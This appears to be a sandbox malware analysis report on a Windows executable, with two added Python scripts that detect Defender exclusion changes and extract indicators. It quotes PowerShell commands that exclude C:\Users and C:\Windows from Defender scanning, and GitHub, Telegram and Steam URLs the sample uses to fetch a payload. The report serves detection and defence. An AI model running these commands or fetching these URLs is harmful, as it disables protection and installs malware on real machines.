
Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Sample name: YYjRtxS70h.exe (renamed because the original name is a hash value)
Original sample name: 5a59ce92b07de68c0be8fbd7944214e2.exe
Analysis ID: 1579768
MD5: 5a59ce92b07de68c0be8fbd7944214e2
SHA1: b0536d674552c3a11a881b154b668af1b5222641
SHA256: e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Tags: exe, user-abuse_ch

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • YYjRtxS70h.exe (PID: 4044 cmdline: "C:\Users\user\Desktop\YYjRtxS70h.exe" MD5: 5A59CE92B07DE68C0BE8FBD7944214E2)
    • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2616 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 3576 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 5608 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
No configs have been found
No yara matches
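The process tree above records the sample spawning three PowerShell children that each run Add-MpPreference -ExclusionPath, first for its own staging directory C:\VmTatwGQo and then for C:\Users and C:\Windows, which is what the two Sigma rules further down fire on. The script below is an added example (not code from the report, from Joe Sandbox or from the sample) of the detection logic a SOC would run over process-creation events: it decodes -EncodedCommand payloads, matches Add-/Set-MpPreference exclusion parameters, and rates an exclusion "high" when it covers a whole system root. The event records are constructed from the command lines in the process tree; the -EncodedCommand event (pid 9001) and the list of "broad" roots are assumptions, not something the report shows.

```python
"""Flag Windows Defender exclusion changes in process-creation events.

Added example; it is not code from the report, from Joe Sandbox or from the
sample. Each event mimics the fields of a Sysmon event 1 / Security 4688
record; the command lines are the ones this report's process tree shows, plus
one constructed -EncodedCommand variant of the kind the "Base64 Encoded
MpPreference Cmdlet" Sigma rule in the report is written for.
"""
import base64
import re

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Assumption: excluding one of these roots blinds on-access scanning for most
# of the system, so it is rated "high" whatever process set it.
BROAD_ROOTS = {r"c:", r"c:\users", r"c:\windows", r"c:\programdata",
               r"c:\program files", r"c:\program files (x86)"}

CMDLET_RE = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b")
PARAM_RE = re.compile(r"(?i)-Exclusion(?P<kind>Path|Process|Extension)\s+"
                      r"(?P<value>'[^']*'|\"[^\"]*\"|\S+)")
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Constructed input: PIDs and command lines taken from the report's process tree,
# plus one synthetic encoded event (pid 9001) that this report did not contain.
SAMPLE_EVENTS = [
    {"pid": 4044, "ppid": None, "image": r"C:\Users\user\Desktop\YYjRtxS70h.exe",
     "cmdline": r'"C:\Users\user\Desktop\YYjRtxS70h.exe"'},
    {"pid": 1788, "ppid": 4044, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 2616, "ppid": 4044, "image": PS,
     "cmdline": r'''"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"'''},
    {"pid": 3576, "ppid": 4044, "image": PS,
     "cmdline": r'''"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"'''},
    {"pid": 5608, "ppid": 4044, "image": PS,
     "cmdline": r'''"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"'''},
    {"pid": 9001, "ppid": 4044, "image": PS,
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + base64.b64encode(
         "Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16-le")).decode("ascii")},
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_exclusion(kind, value):
    """'high' for exclusions that blind Defender broadly, 'medium' for one directory."""
    if kind != "path":
        return "high"  # process and extension exclusions apply system-wide
    norm = value.strip().lower().rstrip("\\")
    return "high" if norm in BROAD_ROOTS else "medium"


def find_defender_exclusions(events):
    """Return one finding per exclusion parameter seen in the events' command lines."""
    findings = []
    for ev in events:
        script = decode_encoded_command(ev["cmdline"])
        text = script if script is not None else ev["cmdline"]
        if not CMDLET_RE.search(text):
            continue
        for m in PARAM_RE.finditer(text):
            kind = m.group("kind").lower()
            value = m.group("value").strip("'\"")
            findings.append({
                "pid": ev["pid"], "ppid": ev["ppid"], "image": ev["image"],
                "kind": kind, "value": value,
                "severity": classify_exclusion(kind, value),
                "encoded": script is not None,
            })
    return findings


if __name__ == "__main__":
    for f in find_defender_exclusions(SAMPLE_EVENTS):
        print(f"pid={f['pid']} {f['severity']:6} Exclusion{f['kind']}={f['value']!r} encoded={f['encoded']}")
```

On a live host the same state is visible without any log: `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists the paths currently excluded, and Defender writes event ID 5007 to the Microsoft-Windows-Windows Defender/Operational log whenever its configuration changes, so an exclusion added this way leaves a record even if the PowerShell process-start event was never collected.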

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 4044, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", ProcessId: 2616, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 4044, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", ProcessId: 2616, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 4044, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", ProcessId: 2616, ProcessName: powershell.exe
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-23T08:51:37.056484+0100  2028765  3         Unknown Traffic  192.168.2.8  49721        37.27.43.98     443               TCP
2024-12-23T08:52:55.063421+0100  2028765  3         Unknown Traffic  192.168.2.8  49712        37.27.43.98     443               TCP
2024-12-23T08:53:31.487765+0100  2028765  3         Unknown Traffic  192.168.2.8  49716        37.27.43.98     443               TCP


AV Detection

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; ReversingLabs: Detection: 63%
Source: YYjRtxS70h.exe; Virustotal: Detection: 62%
Source: YYjRtxS70h.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.3% probability
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Joe Sandbox ML: detected
Source: YYjRtxS70h.exe; Joe Sandbox ML: detected
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Code function: 14_2_0041FC3B CryptStringToBinaryA, CryptStringToBinaryA (14_2_0041FC3B)
Source: unknown; HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: YYjRtxS70h.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb; source: YYjRtxS70h.exe
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Code function: 14_2_0041E359 FindFirstFileA, FindFirstFileA (14_2_0041E359)
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Code function: 14_2_00420370 FindFirstFileA, FindFirstFileA (14_2_00420370)
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Code function: 14_2_0042498B FindFirstFileA, FindFirstFileA (14_2_0042498B)
Source: C:\Users\user\Desktop\YYjRtxS70h.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (0_2_02832309)
Source: global traffic; HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1; Host: github.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /m3wm0w HTTP/1.1; Host: t.me; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /m3wm0w HTTP/1.1; Host: t.me; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic; HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic; HTTP traffic detected: GET /m3wm0w HTTP/1.1; Host: t.me; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic; HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: Joe Sandbox View; IP Address: 104.102.49.254
Source: Joe Sandbox View; IP Address: 20.233.83.145
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 37.27.43.98:443
Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 37.27.43.98:443
Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 37.27.43.98:443
Source: unknown; TCP traffic detected without corresponding DNS query: 37.27.43.98 (11 connections)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 packets)
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Code function: 14_2_00418024 InternetReadFile (14_2_00418024)
Source: global traffic; HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1; Host: github.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /m3wm0w HTTP/1.1; Host: t.me; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /m3wm0w HTTP/1.1; Host: t.me; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic; HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic; HTTP traffic detected: GET /m3wm0w HTTP/1.1; Host: t.me; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic; HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache; Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;) equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;a( equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: t-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: github.com
Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic; DNS traffic detected: DNS query: t.me
Source: global traffic; DNS traffic detected: DNS query: steamcommunity.com
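The network findings above are the indicators an analyst actually carries out of this report: the GitHub download of jtkhikadjthsad.exe, the t.me and steamcommunity.com profile fetches, the JA3 hashes, the Suricata SID 2028765 alerts, and 37.27.43.98, which the dropped file contacts over TLS with no preceding DNS lookup (so the address is most likely embedded in the binary). The script below is an added example, not part of the report or of Joe Sandbox, of turning report lines into a deduplicated indicator list. REPORT_LINES is a hand-picked subset of this report's lines, copied exactly as the page renders them, with the missing separator after "Source: <origin>", so each pattern anchors on the wording of the finding. The resolver allowlist (1.1.1.1 and friends are sandbox infrastructure, not indicators) and the "hard-coded IP" label for no-DNS peers are assumptions of the example.

```python
"""Turn Joe Sandbox-style report lines into a deduplicated indicator list.

Added example; it is not part of the report, of Joe Sandbox or of the sample.
REPORT_LINES is a hand-picked subset of this report's own lines, kept exactly as
the page renders them (the separator after 'Source: <origin>' is missing), so
each pattern anchors on the wording of the finding rather than on field boundaries.
"""
import ipaddress
import re

# Assumption: the sandbox's recursive resolvers are infrastructure, not indicators.
PUBLIC_RESOLVERS = {"1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4"}

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
HTTP_RE = re.compile(
    r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]"
    r"Host: ([A-Za-z0-9.-]+?)(?=Connection:|Cache-Control:|Cookie:|User-Agent:|$)")
JA3_RE = re.compile(r"JA3 fingerprint: ([0-9a-f]{32})")
IDS_RE = re.compile(r"Suricata IDS: (\d+) - Severity (\d) - (.+?) : "
                    + IPV4 + r":(\d+) -> " + IPV4 + r":(\d+)")
NO_DNS_RE = re.compile(r"traffic detected without corresponding DNS query: " + IPV4)
DNS_RE = re.compile(r"DNS traffic detected: DNS query: ([A-Za-z0-9.-]+)")
PATH_RE = re.compile(r"Source: ([A-Za-z]:\\\S+?\.exe)")
HASH_RE = re.compile(r"\b([0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})\b")
HASH_KIND = {32: "md5", 40: "sha1", 64: "sha256"}

# Constructed input: lines copied verbatim from this report.
REPORT_LINES = [
    "MD5:5a59ce92b07de68c0be8fbd7944214e2",
    "SHA1:b0536d674552c3a11a881b154b668af1b5222641",
    "SHA256:e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a",
    r"Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeReversingLabs: Detection: 63%",
    "Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache",
    "Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache",
    "Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e",
    "Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 37.27.43.98:443",
    "Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98",
    "Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1",
    "Source: global trafficDNS traffic detected: DNS query: github.com",
]


def is_external(ip):
    """True for globally routable addresses that are not a known public resolver."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_global and ip not in PUBLIC_RESOLVERS


def extract_iocs(lines):
    """Collect hashes, JA3 values, hosts, URLs, hard-coded peers and file paths."""
    found = {k: set() for k in ("md5", "sha1", "sha256", "ja3", "domains",
                                "urls", "hardcoded_ips", "file_paths")}
    alerts = []
    for line in lines:
        if m := JA3_RE.search(line):
            found["ja3"].add(m.group(1))  # a JA3 is also 32 hex chars: keep it out of md5
        else:
            for h in HASH_RE.findall(line):
                found[HASH_KIND[len(h)]].add(h.lower())
        if m := HTTP_RE.search(line):
            _method, path, host = m.groups()
            found["domains"].add(host)
            found["urls"].add(host + path)  # scheme omitted: the report shows decrypted requests only
        if m := IDS_RE.search(line):
            sid, sev, msg, src, _sport, dst, dport = m.groups()
            alerts.append({"sid": sid, "severity": int(sev), "msg": msg,
                           "src": src, "dst": dst, "dport": int(dport)})
        if m := NO_DNS_RE.search(line):
            if is_external(m.group(1)):  # contacted by IP with no lookup: likely embedded in the binary
                found["hardcoded_ips"].add(m.group(1))
        if m := DNS_RE.search(line):
            found["domains"].add(m.group(1))
        if m := PATH_RE.search(line):
            found["file_paths"].add(m.group(1))
    result = {k: sorted(v) for k, v in found.items()}
    result["ids_alerts"] = alerts
    return result


if __name__ == "__main__":
    for key, values in extract_iocs(REPORT_LINES).items():
        print(f"{key}: {values}")
```

The github.com and raw.githubusercontent.com entries deserve a caveat before they go into a blocklist: they are the payload's hosting, not attacker-owned infrastructure, so the URL (repository and file name) is the usable indicator, not the domain.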
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000005.00000002.1561429732.0000000007723000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mi
